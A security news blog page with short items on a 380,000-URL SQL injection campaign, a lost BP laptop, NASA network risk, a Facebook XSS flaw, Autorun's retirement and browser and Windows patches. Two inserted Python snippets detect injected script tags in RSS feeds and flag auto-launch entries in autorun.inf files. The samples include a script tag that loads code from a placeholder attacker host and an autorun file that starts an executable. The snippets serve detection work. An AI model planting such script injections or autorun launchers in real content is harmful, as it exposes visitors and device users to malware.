The Security Pub

Random Thoughts About Security

SQL Injection Attack Compromises 380,000 URLs

A massive SQL injection attack campaign has been spotted by Websense researchers, and the number of unique URLs affected by it has risen from 28,000 when first detected yesterday, to 380,000 when the researchers last checked.

The injected script redirects users that have landed on various infected pages to the domain in the script, which then redirects them further to a website simulating an anti-malware check and peddling a rogue AV solution.

Both sites are currently offline, say the researchers, but the attackers have started using other domains for redirection, and will likely keep changing them up.

The researchers also noted that some iTunes URLs have been injected with the script, but that Apple has done a good job of securing the site against this kind of attack.

“The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn’t execute on the user’s computer,” they explained.
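As an added illustration of the point in the quote above (not code from the researchers or from the original post): the constructed podcast feed below carries an injected script element in one item, a small parser flags it, and HTML-encoding the feed text before rendering keeps the tag inert, which is the behaviour credited to iTunes. The domain in the sample is a placeholder.

```python
import html
import re
import xml.etree.ElementTree as ET

# Constructed sample feed, not a real podcast: the second item carries an
# injected <script> element of the kind planted into feeds by the campaign.
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Demo Podcast</title>
<item><title>Episode 1</title><description>Show notes for episode one.</description></item>
<item><title>Episode 2</title>
<description><![CDATA[Show notes <script src="http://attacker.invalid/ur.php"></script>]]></description>
</item>
</channel></rss>"""

# Matches an opening <script ...> tag regardless of case or spacing.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def find_injected_scripts(feed_xml):
    """Return titles of items that carry a <script> tag, either as raw text
    (CDATA / entity-encoded) or as an actual child element of the item."""
    root = ET.fromstring(feed_xml)
    flagged = []
    for item in root.iter("item"):
        title = item.findtext("title", default="")
        if item.find(".//script") is not None:
            flagged.append(title)
            continue
        for field in ("title", "description"):
            text = item.findtext(field, default="") or ""
            if SCRIPT_TAG.search(text):
                flagged.append(title)
                break
    return flagged


def render_safely(text):
    """Encode feed text before inserting it into a page, so an injected tag is
    displayed as literal characters instead of being executed by the browser."""
    return html.escape(text, quote=True)
```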

Missing BP Laptop had Personal Data of Gulf Oil Spill Victims


A BP employee lost a laptop containing unencrypted personal information on approximately 13,000 people who had filed compensation claims prior to August 2010 stemming from the Gulf oil spill.

BP spokesperson, Curtis Thomas, said the oil company sent out letters notifying those affected and reported the incident to law enforcement on Monday. BP contends that none of the personal information has been misused, but nonetheless is offering to pay for any necessary credit monitoring services to the victims of the breach.

“We’re committed to the people of the Gulf Coast states affected by the Deepwater Horizon accident and spill, and we deeply regret that this occurred,” said Thomas.

The employee in question lost the laptop on March 1 during business travel, nearly a month ago. When asked why so much time elapsed before the incident was reported, Thomas claimed his company had been doing “due diligence and investigating” the incident, according to AP.

The breach only affects claimants who filed claims directly to BP before the Gulf Coast Claims Facility took over the compensation operation in August of last year.

NASA systems dangerously at risk from cyberattack

An official audit of NASA’s network has concluded that the space agency faces a high risk of cyberattack.

Experts from the Office of the Inspector General (OIG) paint a grim picture of the state of the space agency’s server infrastructure, warning that vulnerabilities in its systems leave it open to defacement, denial of service or information-stealing attacks.

In particular, six unnamed IT systems were found to be at risk of attacks that might allow hackers to seize remote control of critical systems over the net – including systems that control spacecraft – as a result of unpatched software vulnerabilities.

Read the full article – The Register

Facebook Vulnerability

An unpatched XSS vulnerability in the mobile API version of Facebook is currently being exploited to post messages to users’ Walls; those messages serve as a gateway to the specially crafted website that exploits the flaw.

The flaw has been misused for a while now, but has only recently been used widely. Indonesian users are currently targeted by various groups using the vulnerability to their advantage.

“It allows any website to include, for example, a maliciously prepared iframe element that contains JavaScript or use the http-equiv attribute’s “refresh” value to redirect the browser to the prepared URL containing the JavaScript,” explains Symantec. “Any user who is logged into Facebook and visits a site that contains such an element will automatically post an arbitrary message to his or her wall.”

No user interaction is needed, so the messages are spreading through Facebook at a fast pace. Facebook’s security team has been notified about the vulnerability and is working on a fix. Hopefully it will be issued soon, since the attack seems easy to recreate.

Symantec advises users to log out of Facebook when they are not actively using it, or to use script-blocking add-ons to prevent the attack.

Microsoft finally says sayonara to Autorun

After a decade of abuse, Autorun is finally being retired in older versions of Windows.

On Tuesday, Microsoft began pushing an update that changes the way Windows Server 2008 and earlier versions of the OS respond when USB thumb drives and other portable media are plugged in. Until now, those versions dutifully executed code embedded in autorun.inf files without first prompting the user. The default behavior provided a convenient way to propagate malware such as Conficker, which hijacked the feature to spread itself each time an infected drive was inserted.
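An added example, not from the article or from Microsoft: a small parser that reads an autorun.inf file and reports the directives that would launch a program, which is the behaviour the update stops for removable media. The file contents are constructed for the demonstration, not a captured malware sample.

```python
import re

# Directives in an [autorun] section that make Explorer launch a program.
# 'open' and 'shellexecute' ran without a prompt on the unpatched versions
# described above; shell\<verb>\command entries hook the drive's context menu.
AUTO_EXEC_KEYS = {"open", "shellexecute"}
SHELL_COMMAND = re.compile(r"^shell\\[^\\]+\\command$", re.IGNORECASE)


def parse_autorun(text):
    """Parse autorun.inf into {section: {key: value}}, ignoring blank and
    comment lines (the format is INI-like but often hand-written)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def autorun_findings(text):
    """Return (directive, target) pairs from [autorun] that would launch code."""
    autorun = parse_autorun(text).get("autorun", {})
    return [(key, value) for key, value in autorun.items()
            if key in AUTO_EXEC_KEYS or SHELL_COMMAND.match(key)]


# Constructed sample (placeholder paths): a program launched on insertion and
# again via the drive's context menu. The 'action' text is only the label the
# AutoPlay dialog shows, so it says nothing about what is really executed.
SAMPLE_AUTORUN = """[autorun]
open=files\\launcher.exe
icon=%SystemRoot%\\system32\\shell32.dll,4
shell\\open\\command=files\\launcher.exe
action=Open folder to view files
"""
```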

Read the full article – The Register

Google Secures Chrome

Version 9.0.597.84 of the Google Chrome browser is also available and fixes 9 security vulnerabilities: 1 rated critical, 2 high and the remaining 6 rated ‘low’ by the Google developers. As usual, the update is installed automatically in the background. To make sure the latest version is installed and active, open the Chrome menu and check the ‘About Chrome’ entry; if the update has not been installed yet, opening that entry triggers it.

Microsoft Patchday ahead

The Redmond company today announced that it plans to release 12 security bulletins on the upcoming Patch Tuesday. The corresponding updates close 22 security holes in the Windows operating systems, Internet Explorer and Microsoft Office. Of those, 3 bulletins address critical-rated vulnerabilities and the rest are rated important. Be prepared to test and roll out the updates as soon as possible: 5 of the bulletins deal with vulnerabilities that allow attackers to remotely execute code on affected computers.

According to a blog post in Microsoft’s Security Response Center, the February Patchday updates will fix the MHTML processing vulnerability as well as the thumbnail rendering security hole.